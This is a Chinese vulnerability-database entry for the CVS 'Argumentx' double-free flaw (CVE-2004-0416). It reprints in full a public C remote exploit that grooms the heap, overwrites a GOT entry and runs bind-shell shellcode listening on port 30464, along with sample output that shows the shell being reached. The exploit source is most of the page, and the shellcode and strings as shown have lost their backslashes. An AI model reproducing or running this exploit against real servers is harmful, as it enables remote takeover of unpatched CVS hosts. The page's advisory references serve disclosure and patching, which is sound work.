CVS Argumentx命令error_prog_name两次释放任意指令执行漏洞

CVS Argumentx命令error_prog_name两次释放任意指令执行漏洞

漏洞ID 1108120 漏洞类型 缓冲区溢出
发布时间 2004-08-13 更新时间 2005-10-20
图片[1]-CVS Argumentx命令error_prog_name两次释放任意指令执行漏洞-安全小百科CVE编号 CVE-2004-0416
图片[2]-CVS Argumentx命令error_prog_name两次释放任意指令执行漏洞-安全小百科CNNVD-ID CNNVD-200408-055
漏洞平台 Linux CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/392
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200408-055
|漏洞详情
ConcurrentVersionsSystem(CVS)是一款开放源代码的版本控制软件。CVS”Argumentx”命令存在两次释放问题,远程攻击者可以利用这个漏洞以进程权限在系统上执行任意指令。”Argumentx”命令允许为先前提供的参数增加更多数据,这可以通过对最后一个存储参数进行重分配来操作,但是”Argumentx”没有检查在参数列表中是否有任何参数,因为当客户端断开连接的时候程序会释放这个列表,如果列表是空的,realloc()调用就会去试图释放一个不应该被这样操作的指针。此”double-free()”漏洞在多个Linux系统上成功利用。
|漏洞EXP
/* Remote CVS <= 1.11.15 exploit for the error_prog_name double free vuln. 
* 
* by Gyan Chawdhary, [email protected] 
* 
* Vulnerability Description: 
* 
* The Vulnerability lies in the serve_argumentx function. The Argumentx 
command 
* parameter is used to append data to a previously supplied Argument 
command. 
* These data pointers are stored in the argument_vector array. The 
* serve_argumentx fails to check wether an Argument command is present in 
the 
* argument_vector and may append data to a pointer that should not get 
* touched at all, in our case the *error_prog_name string. The function 
calls 
* realloc to create space for the new string. Because realloc will be called 
* to store strlen(error_prog_name) + strlen(somedata) the original chunk 
which 
* just stores error_prog_name will get freed. This free chunk will once 
again 
* get freed after we disconnect from the CVS pserver. 
* 
* Theory: 
* 
* Sucessful exploitation depends heavily on a specific heap layout to be 
met. 
* The argument_vector is initialized for holding 3 ptrs. If more space is 
* required it will call realloc. The error_prog_name string resides right 
* after the argument_vector chunk. 
* 
* |11| arg_vector |11| error_prog_name |109| some chunk 
* 
* address of error_prog_name is stored in the argument_vector[0]. 
* 
* To achive sucessfull exploitation the following steps are performed. 
* 
* 1) Send Argumentx command with a large argument to reallocate 
error_prog_name 
* + large command on top of the heap. This will free the original 
* error_prog_name buffer. 
* 
* 2) Send 50 Argument calls which will require the argument_vector array to 
be 
* reallocated freeing the current buffer. We keep this a high number to get 
* mem from the top itself and to make the exploit reliable. As both the 
* original the arg_vector & err_prg_name buffers are free they are 
* consolidated. Also we supply our fake chunk and shellcode in this call. 
* 
* 3) Send an argument command with the size & prevsize as its arguments. 
This 
* will now be stored in arg_vector & err_prg_name consolidated buffer. 
* 
* 4) Once we close the connection free will be called on the error_prog_name 
* string which will read our fake size & prev_size fields pointing to the 
fake 
* chunk , executing our shellcode. 
* 
* Phew !!!! 
* 
* NOTES: Iv tried this exp on RH 8 with glibc 2.3.*. This exp did NOT work 
on 
* my slack 8.0 cause of glibc 2.2 which creates a very different heap 
layout. 
* Also some tweaking will be required to use this exploit remotely as 
sometimes 
* the overwritten GOT does not execute due to early drop in the connection 
.. 
* Please someone figure it out n mail me :) .. 
* 
* Now the exploit 
* 
* FOR EDUCATIONAL PURPOSE ONLY FOR EDUCATIONAL PURPOSE ONLY FOR EDUCATIONAL 
* PURPOSE ONLY FOR EDUCATIONAL PURPOSE ONLY FOR EDUCATIONAL PURPOSE ONLY FOR 
* EDUCATIONAL PURPOSE ONLY FOR EDUCATIONAL PURPOSE ONLY FOR EDUCATIONAL 
PURPOSE * 
* Greets: jp - for his cool paper on advanced malloc exploits, and the 
heapy.so 
* jaguar@felinemenace - We at ... :P 
* 
* cya 
* 
* Gyan 
*/ 

#include <stdio.h> 
#include <stdlib.h> 
#include <unistd.h> 
#include <string.h> 

#include <sys/socket.h> 
#include <sys/types.h> 
#include <netinet/in.h> 

char shellcode[] = 
"xebx18" 
"AAAAAAAAAAAAAAAAAAAAAAAA" 
"x31xc0" // xorl %eax,%eax 
"x31xdb" // xorl %ebx,%ebx 
"x31xc9" // xorl %ecx,%ecx 
"x31xd2" // xorl %edx,%edx 
"xb0x66" // movb $0x66,%al 
"xb3x01" // movb $0x1,%bl 
"x51" // pushl %ecx 
"xb1x06" // movb $0x6,%cl 
"x51" // pushl %ecx 
"xb1x01" // movb $0x1,%cl 
"x51" // pushl %ecx 
"xb1x02" // movb $0x2,%cl 
"x51" // pushl %ecx 
"x8dx0cx24" // leal (%esp),%ecx 
"xcdx80" // int $0x80 

/* port is 30464 !!! */ 
/* bind(fd, (struct sockaddr)&sin, sizeof(sin) ) */ 
"xb3x02" // movb $0x2,%bl 
"xb1x02" // movb $0x2,%cl 
"x31xc9" // xorl %ecx,%ecx 
"x51" // pushl %ecx 
"x51" // pushl %ecx 
"x51" // pushl %ecx 
/* port = 0x77, change if needed */ 
"x80xc1x77" // addb $0x77,%cl 
"x66x51" // pushl %cx 
"xb1x02" // movb $0x2,%cl 
"x66x51" // pushw %cx 
"x8dx0cx24" // leal (%esp),%ecx 
"xb2x10" // movb $0x10,%dl 
"x52" // pushl %edx 
"x51" // pushl %ecx 
"x50" // pushl %eax 
"x8dx0cx24" // leal (%esp),%ecx 
"x89xc2" // movl %eax,%edx 
"x31xc0" // xorl %eax,%eax 
"xb0x66" // movb $0x66,%al 
"xcdx80" // int $0x80 

/* listen(fd, 1) */ 
"xb3x01" // movb $0x1,%bl 
"x53" // pushl %ebx 
"x52" // pushl %edx 
"x8dx0cx24" // leal (%esp),%ecx 
"x31xc0" // xorl %eax,%eax 
"xb0x66" // movb $0x66,%al 
"x80xc3x03" // addb $0x3,%bl 
"xcdx80" // int $0x80 

/* cli = accept(fd, 0, 0) */ 
"x31xc0" // xorl %eax,%eax 
"x50" // pushl %eax 
"x50" // pushl %eax 
"x52" // pushl %edx 
"x8dx0cx24" // leal (%esp),%ecx 
"xb3x05" // movl $0x5,%bl 
"xb0x66" // movl $0x66,%al 
"xcdx80" // int $0x80 

/* dup2(cli, 0) */ 
"x89xc3" // movl %eax,%ebx 
"x31xc9" // xorl %ecx,%ecx 
"x31xc0" // xorl %eax,%eax 
"xb0x3f" // movb $0x3f,%al 
"xcdx80" // int $0x80 

/* dup2(cli, 1) */ 
"x41" // inc %ecx 
"x31xc0" // xorl %eax,%eax 
"xb0x3f" // movl $0x3f,%al 
"xcdx80" // int $0x80 

/* dup2(cli, 2) */ 
"x41" // inc %ecx 
"x31xc0" // xorl %eax,%eax 
"xb0x3f" // movb $0x3f,%al 
"xcdx80" // int $0x80 

/* execve("//bin/sh", ["//bin/sh", NULL], NULL); */ 
"x31xdb" // xorl %ebx,%ebx 
"x53" // pushl %ebx 
"x68x6ex2fx73x68" // pushl $0x68732f6e 
"x68x2fx2fx62x69" // pushl $0x69622f2f 
"x89xe3" // movl %esp,%ebx 
"x8dx54x24x08" // leal 0x8(%esp),%edx 
"x31xc9" // xorl %ecx,%ecx 
"x51" // pushl %ecx 
"x53" // pushl %ebx 
"x8dx0cx24" // leal (%esp),%ecx 
"x31xc0" // xorl %eax,%eax 
"xb0x0b" // movb $0xb,%al 
"xcdx80" // int $0x80 

/* exit(%ebx) */ 
"x31xc0" // xorl %eax,%eax 
"xb0x01" // movb $0x1,%al 
"xcdx80"; // int $0x80 

void login(char *, char *, char *); 

struct           sockaddr_in s; 
int             sock; 

void xp_connect(char *ip) 
{ 
        char buffer[1024]; 
        char temp[1024]; 
        int tmp; 

        s.sin_family = AF_INET; 
        s.sin_port = htons(2401); 
        s.sin_addr.s_addr = inet_addr(ip); 

        if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) 
        { 
                printf("Cannot create socketn"); 
                exit(-1); 
        } 

        if((connect(sock,(struct sockaddr *)&s,sizeof(struct sockaddr))) < 
0) 
        { 
                printf("Cannot connect()n"); 
                exit(-1); 
        } 
} 

void xp_write(char *data) 
{ 

if(write (sock, data, strlen(data)) < 0) 
{ 
printf("write() failedn"); 
exit(-1); 
} 
} 

void xp_receive() 
{ 
int tmp; 
char buffer[1024*2]; 

if ( (tmp = read(sock, buffer, sizeof(buffer))) <= 0) 
{ 
printf("read() failedn"); 
exit(-1); 
} 
printf("%s", buffer); 
} 




#define GOT_MEMCPY 0x80d2b4a 
#define SHELL_ADDR 0x080cda20 

char *egg(unsigned int what, unsigned int where) 
{ 
        char *ptr, *buf; 
        int i=0; //dummy = 0xfffffffc; 
        int size = strlen(shellcode); 

        // Will contain our fake chunk supplided with our fd & bk fields, 
        // addr of shellcode & got addr - 8 of free(). We will also try to 
        // stuff in our shellcode in the same buffer as I dont have enough 
        // gdb patience/time   to find nother controlable buffer :P 
        buf = (char *)malloc(1250); 
        ptr = buf; 

        for (;i<1248;) { 

        *( (int **)ptr ) = (int *)( where - 8 ); 
        ptr+=4; 
        *( (int **)ptr ) = (int *)( what ); 
        ptr+=4; 

        i+=8; 
        } 
        buf[1250] = ''; 
        ptr -= size; 
strcpy(ptr, shellcode); 
        ptr = buf; 
        return ptr; 

} 

unsigned char shifts[] = { 
      0,   1,   2,   3,   4,   5,   6,   7,   8,   9, 10, 11, 12, 13, 14, 15, 
      16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 
      114,120, 53, 79, 96,109, 72,108, 70, 64, 76, 67,116, 74, 68, 87, 
      111, 52, 75,119, 49, 34, 82, 81, 95, 65,112, 86,118,110,122,105, 
      41, 57, 83, 43, 46,102, 40, 89, 38,103, 45, 50, 42,123, 91, 35, 
      125, 55, 54, 66,124,126, 59, 47, 92, 71,115, 78, 88,107,106, 56, 
      36,121,117,104,101,100, 69, 73, 99, 63, 94, 93, 39, 37, 61, 48, 
      58,113, 32, 90, 44, 98, 60, 51, 33, 97, 62, 77, 84, 80, 85,223, 
      225,216,187,166,229,189,222,188,141,249,148,200,184,136,248,190, 
      199,170,181,204,138,232,218,183,255,234,220,247,213,203,226,193, 
      174,172,228,252,217,201,131,230,197,211,145,238,161,179,160,212, 
      207,221,254,173,202,146,224,151,140,196,205,130,135,133,143,246, 
      192,159,244,239,185,168,215,144,139,165,180,157,147,186,214,176, 
      227,231,219,169,175,156,206,198,129,164,150,210,154,177,134,127, 
      182,128,158,208,162,132,167,209,149,241,153,251,237,236,171,195, 
      243,233,253,240,194,250,191,155,142,137,245,235,163,242,178,152 }; 

char   *scramble(char * str) 
{ 
    int                 i; 
    char                 * s; 

    s = (char *) malloc (strlen (str) + 3); 
    memset(s, '', strlen(str) + 3); 
    *s = 'A'; 
    for (i = 1; str[i - 1]; i++) 
    s = shifts[(unsigned char)(str[i - 1])]; 
    return (s); 
} 

#define LOGIN "BEGIN AUTH REQUESTn/home/cvsrootn%sn%snEND AUTH 
REQUESTn" 
#define REQUEST "Root %sn" 

void login(char *login, char *password, char *repo) 
{ 
char *buf, *ptr, reply[1024]; 
char *rep, *rp; 
buf = (char *)malloc(1024); 
rep = (char *)malloc(512); 

ptr = buf; 
rp = rep; 
sprintf(ptr, LOGIN, login, scramble(password)); 
sprintf(rp, REQUEST, repo); 

ptr = buf; 

xp_write(ptr); /* login request */ 
xp_receive(); 
xp_write(rp); /* root dir request */ 


} 

char argumentx[] = "Argumentx %sn"; 
char argument[] =   "Argument %sn"; 
char trash[] = "FCUK"; 
char str[] = "Argument x42x42x42x42x6exffxffxffx1cxfcxffxff" 
    "xf0xffxffxffx41x41n"; 

void overflow() 
{ 
  char *data, *dptr, *buf, *bufp, *eg, *arg, *aptr; 
int i; 
data = (char *)malloc(111111); 
dptr = data; 
buf = (char *)malloc(111111+20); 
bufp = buf; 
arg = (char *)malloc(1500); 
aptr = arg; 


memset(dptr, 'x41', 111111); 
sprintf(bufp, argumentx, data); 
xp_write(bufp); 

eg = egg(0x80d2b4a, 0x080cda20); 
sprintf(aptr, argument, eg); 

for (i=0 ; i<50; i++) 
xp_write(aptr); 

xp_write(str); 
xp_write(trash); 
} 



void usage(char *name) 
{ 
printf("CVS <= 1.11.15 Argumentx double free() remote exploit by Gyan" 
      "Chawdhary ([email protected])n" 
              "Usage: %s <options>n" 
      "-i <target IP address>n" 
      "-l <login>n" 
      "-p <password>n" 
      "-r <repository path>nn", name); 
} 



main(int argc, char **argv) 
{ 
int c; 
char ip[16], user[32], pass[32], rep[512]; 

ip[0] = 0; 
user[0] = 0; 
pass[0] = 0; 
rep[0] = 0; 

if (argc < 2) { 
usage(argv[0]); 
exit(0); 
} 

while ((c = getopt(argc, argv, "h::l:p:i:r:")) != -1) { 

switch(c) { 

case 'h': 
usage(argv[0]); 
exit(0); 
case 'i': 
strncpy(ip, optarg, sizeof(ip)); 
break; 
case 'l': 
strncpy(user, optarg, sizeof(user)); 
break; 
case 'p': 
strncpy(pass, optarg, sizeof(pass)); 
break; 
case 'r': 
strncpy(rep, optarg, sizeof(rep)); 
break; 
} 
} 

if(ip) { 
printf("Connecting to vulnerable CVS server ..."); 
xp_connect(ip); 
printf("OKn"); 
} 

        printf("Logging in ..."); 
        login(user, pass, rep); 
printf("OKn"); 

      printf("Exploiting the CVS error_prog_name double free now ..."); 
      overflow(); 
      printf("DONEn"); 
      printf("If everything went well there should be a shell on port 
30464n"); 
} 





//xp_connect("127.0.0.1"); 
//sleep(20); 
//login("gyan", "gyan"); 
//overflow(shellcode); 

/* 

[root@ill crazy]# ./free -i 127.0.0.1 -l gyan -p gyan -r /home/cvsroot 
Connecting to vulnerable CVS server ...OK 
Logging in ...I LOVE YOU 
OK 
Exploiting the CVS error_prog_name double free now ...DONE 
If everything went well there should be a shell on port 30464 
[root@ill crazy]# telnet 127.0.0.1 30464 
Trying 127.0.0.1... 
Connected to localhost.localdomain (127.0.0.1). 
Escape character is '^]'. 

*/ 

// milw0rm.com [2004-08-13]
|参考资料

来源:DEBIAN
名称:DSA-519
链接:http://www.debian.org/security/2004/dsa-519
来源:BUGTRAQ
名称:20040611[OpenPKG-SA-2004.027]OpenPKGSecurityAdvisory(cvs)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=108716553923643&w;=2
来源:REDHAT
名称:RHSA-2004:233
链接:http://www.redhat.com/support/errata/RHSA-2004-233.html
来源:MANDRAKE
名称:MDKSA-2004:058
链接:http://www.mandriva.com/security/advisories?name=MDKSA-2004:058
来源:GENTOO
名称:GLSA-200406-06
链接:http://security.gentoo.org/glsa/glsa-200406-06.xml
来源:security.e-matters.de
链接:http://security.e-matters.de/advisories/092004.html
来源:OVAL
名称:oval:org.mitre.oval:def:10070
链接:http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre.oval:def:10070
来源:FULLDISC
名称:20040609Advisory09/2004:MoreCVSremotevulnerabilities
链接:http://lists.grok.org.uk/pipermail/full-disclosure/2004-June/022441.html
来源:SGI
名称:20040605-01-U
链接:ftp://patches.sgi.com/support/free/security/advisories/20040605-01-U.asc
来源:SGI
名称:20040604-01-U
链接:ftp://patches.sgi.com/support/free/security/advisories/2

相关推荐: ACME Labs thttpd Cross-Site Scripting Vulnerability

ACME Labs thttpd Cross-Site Scripting Vulnerability 漏洞ID 1102128 漏洞类型 Input Validation Error 发布时间 2002-04-25 更新时间 2002-04-25 CVE编号…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享